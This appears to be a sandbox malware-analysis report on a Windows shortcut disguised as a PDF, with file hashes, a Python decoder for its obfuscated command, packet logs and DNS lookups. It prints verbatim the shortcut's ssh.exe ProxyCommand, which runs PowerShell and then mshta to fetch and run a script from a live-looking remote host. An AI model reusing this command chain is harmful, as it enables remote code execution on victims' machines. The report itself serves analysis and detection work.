                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55
                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                  Malicious:false
                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Tue Mar 12 19:03:11 2024, mtime=Mon Jun 17 15:01:49 2024, atime=Tue Mar 12 19:03:11 2024, length=450560, window=hidenormalshowminimized
                                                                                                  Entropy (8bit):3.191072174036921
                                                                                                  TrID:
                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                  File name:Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk
                                                                                                  File size:2'643 bytes
                                                                                                  MD5:ae4dbbe945aeacfa5bb920e8d85cd0cb
                                                                                                  SHA1:36a91b26586d8e758ac0dcf09f9d5ed40de75b3a
                                                                                                  SHA256:f767f605802f74a578ced15d21e057249c9237dc0b4c09dbadc2d0e996411e91
                                                                                                  SHA512:47defd3a0c17ee59fc1b1c3ec1985a5563982a6998cd13eb6d40aaba4be020e2b2ac8045f80e0f9929aa881053cab43d1a953982d36cdff0612abffcd3ec8809
                                                                                                  SSDEEP:48:8FLZrCPGDaUk1alAs2C3qvV+dJ9bBpBI5Wb:8FFrH2UCo2/tKnvI
                                                                                                  TLSH:AF5186003BE6072CF6735F35987AA630B57BBC01EEA1DB1D0087418C2432A64D5B5F6B
                                                                                                  File Content Preview:L..................F.@.. ......O.t...6a........O.t...............................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                                                  Icon Hash:72d282828e8d8dd5

                                                                                                  General

                                                                                                  Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                                                                                                  Command Line Argument: -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" .
                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
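The LNK does not launch PowerShell directly: its target is the signed OpenSSH client, and the payload rides in `-o ProxyCommand`, which ssh runs to set up its transport before any SSH traffic, so the host argument (here a bare `.`) never has to exist. The PowerShell one-liner inside it carries the real command as a string padded with `]` characters and strips them with `-replace ']'` at run time. The script below is an added example (editor code, not part of the Joe Sandbox report and not the sample's own code) that pulls the ProxyCommand out of the argument, applies the same `-replace` the malware applies, and lists the indicators a detection engineer would key on. RELATIVE_PATH and ARGUMENT are copied verbatim from the General section above; the function names and the indicator wording are this example's own.

```python
"""Decode the obfuscated ssh.exe ProxyCommand carried by this LNK.

Added example by the editor; not code from the Joe Sandbox report or from
the sample. RELATIVE_PATH and ARGUMENT are copied from the report's
"General" section; function names and indicator wording are this example's.
"""
import json
import re
from urllib.parse import urlsplit

# Copied verbatim from the report's LNK "General" section.
RELATIVE_PATH = r"..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe"
ARGUMENT = (
    '-o ProxyCommand="powershell powershell -Command (\''
    "m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/"
    "c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/"
    "]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]"
    "' -replace ']')\" ."
)

# The quoted value handed to ssh's ProxyCommand option (greedy: up to the last quote).
PROXY_RE = re.compile(r'ProxyCommand="(?P<cmd>.*)"')
# PowerShell's ('<payload>' -replace '<pattern>') form with a single operand,
# which deletes every regex match of <pattern> from <payload>.
REPLACE_RE = re.compile(r"\('(?P<payload>[^']*)'\s+-replace\s+'(?P<pattern>[^']+)'\)")


def proxy_command(argument: str) -> str:
    m = PROXY_RE.search(argument)
    if not m:
        raise ValueError("no -o ProxyCommand=\"...\" in argument")
    return m.group("cmd")


def decode_replace_obfuscation(ps_command: str) -> str:
    """Apply the same one-operand -replace the script applies at run time."""
    m = REPLACE_RE.search(ps_command)
    if not m:
        raise ValueError("no ('...' -replace '...') expression found")
    # A bare ']' is a literal in both .NET and Python regex, so re.sub matches
    # what PowerShell does here; other patterns would need the same care.
    return re.sub(m.group("pattern"), "", m.group("payload"))


def assess(relative_path: str, argument: str) -> dict:
    cmd = proxy_command(argument)
    payload = REPLACE_RE.search(cmd).group("payload")
    decoded = decode_replace_obfuscation(cmd)
    exe, _, url = decoded.partition(" ")

    indicators = []
    if relative_path.lower().endswith("ssh.exe"):
        indicators.append("LNK target is the signed OpenSSH client (LOLBin)")
    if "proxycommand" in argument.lower():
        indicators.append("-o ProxyCommand spawns a child process before any SSH traffic")
    if "powershell" in cmd.lower():
        indicators.append("ProxyCommand launches powershell.exe")
    if exe.lower() in ("mshta", "mshta.exe"):
        indicators.append("decoded command is mshta.exe fetching a remote script")

    return {
        "target": relative_path.rsplit("\\", 1)[-1],
        "decoded_command": decoded,
        "url_host": urlsplit(url).hostname if url else None,
        # Share of the payload that is filler; a high value is itself a signal.
        "junk_ratio": round(1 - len(decoded) / len(payload), 3),
        "indicators": indicators,
    }


if __name__ == "__main__":
    print(json.dumps(assess(RELATIVE_PATH, ARGUMENT), indent=2))
```

Decoding reproduces `mshta.exe` followed by an `https://` URL on the `.shop` host that the report's network section resolves to 104.21.83.229, which is why the dropped-file list shows mshta.exe as the parent of the next stage. For a detection rule the durable features are the process chain (ssh.exe with `ProxyCommand` spawning powershell.exe, then mshta.exe) and the filler ratio, not the particular bracket character, which an attacker can change freely.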
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 17, 2024 08:48:04.232789040 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:04.232841969 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:04.232916117 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:04.245409012 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:04.245425940 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:05.465539932 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:05.465643883 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:05.518136978 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:05.518203020 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:05.519165039 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:05.519251108 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:05.522032022 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:05.563333035 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.135211945 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.135260105 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.135287046 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.135322094 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.135346889 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.135379076 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.135399103 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.135464907 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.135505915 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.136414051 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.143501997 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.144454956 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.144496918 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.148423910 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.152084112 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.152410030 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.160569906 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.164135933 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.164165974 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.164685965 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.255367041 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.256542921 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.259608984 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.260448933 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.326699972 CET  443          49704      104.21.83.229  192.168.2.5
Dec 17, 2024 08:48:06.326961994 CET  49704        443        192.168.2.5    104.21.83.229
Dec 17, 2024 08:48:06.330873966 CET  443          49704      104.21.83.229  192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.332431078 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.332467079 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.336426020 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.336786985 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.336852074 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.345210075 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.348432064 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.348455906 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.348519087 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.352425098 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.352509022 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.352541924 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.356422901 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.360573053 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.364234924 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.364258051 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.364325047 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.368249893 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.368432999 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.368457079 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.368537903 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.376358032 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.380459070 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.380522966 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.380589962 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.383848906 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.383919001 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.391819954 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.394207954 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.394237041 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.394285917 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.398139954 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.400394917 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.400420904 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.400707006 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.404616117 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.408436060 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.408469915 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.412415028 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.440025091 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.440089941 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.442780972 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.443186045 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.443206072 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.443273067 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.476774931 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.476849079 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.519169092 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.519306898 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.519398928 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.519530058 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.522161007 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.524436951 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.531122923 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.531228065 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.544240952 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.544337034 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.557039976 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.557122946 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.557161093 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.557239056 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.570159912 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.570236921 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.576411009 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.576483011 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.585870981 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.585942030 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.594497919 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.594623089 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.599055052 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.599143028 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.607973099 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.608047009 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.612098932 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.612178087 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.622313023 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.622383118 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.629149914 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.629255056 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.629739046 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.629806042 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.639683962 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.639756918 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.645466089 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.645535946 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.711029053 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.711150885 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.712752104 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.712821960 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.719757080 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.719835997 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.723525047 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.723619938 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.726773024 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.726870060 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.734272957 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.734364033 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.736864090 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.736928940 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.742770910 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.742861032 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.746810913 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.746880054 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.749666929 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.749732971 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.755275965 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.755347013 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.759027004 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.759102106 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.761522055 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.761579990 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.769074917 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.769138098 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.769160032 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.769211054 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.770088911 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.770137072 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.773452997 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.773540020 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.777101040 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.777159929 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.778608084 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.778659105 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.782913923 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.782978058 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.785326004 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.785410881 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.785428047 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.788490057 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.788583994 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.791922092 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.791991949 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.794094086 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.794173002 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.797230005 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.797306061 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.830128908 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.830200911 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.830275059 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.830362082 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.830418110 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.830418110 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.909670115 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.909701109 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.909778118 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.909868956 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.909915924 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.909915924 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.919414997 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.919450045 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.920454025 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.920454025 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.920474052 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.920543909 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.930350065 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.930407047 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.930445910 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.930464029 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.930535078 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.930535078 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.941324949 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.941371918 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.941410065 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.941426039 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.941457987 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.941477060 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.951677084 CET44349704104.21.83.229192.168.2.5
                                                                                                   Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                   Dec 17, 2024 08:48:04.074757099 CET | 192.168.2.5 | 1.1.1.1 | 0x477f | Standard query (0) | cndef1.green-pathways.shop | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:10.328735113 CET | 192.168.2.5 | 1.1.1.1 | 0x6551 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:18.014192104 CET | 192.168.2.5 | 1.1.1.1 | 0xaf21 | Standard query (0) | www.360.net | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:19.025834084 CET | 192.168.2.5 | 1.1.1.1 | 0xaf21 | Standard query (0) | www.360.net | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:22.111862898 CET | 192.168.2.5 | 1.1.1.1 | 0x5e87 | Standard query (0) | 360.net | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:23.119909048 CET | 192.168.2.5 | 1.1.1.1 | 0x5e87 | Standard query (0) | 360.net | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:25.167845011 CET | 192.168.2.5 | 1.1.1.1 | 0x72a1 | Standard query (0) | www.baidu.com | A (IP address) | IN (0x0001) | false
                                                                                                   Dec 17, 2024 08:48:29.365550995 CET | 192.168.2.5 | 1.1.1.1 | 0xe1d9 | Standard query (0) | berb.fitnessclub-filmfanatics.com | A (IP address) | IN (0x0001) | false
                                                                                                   Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
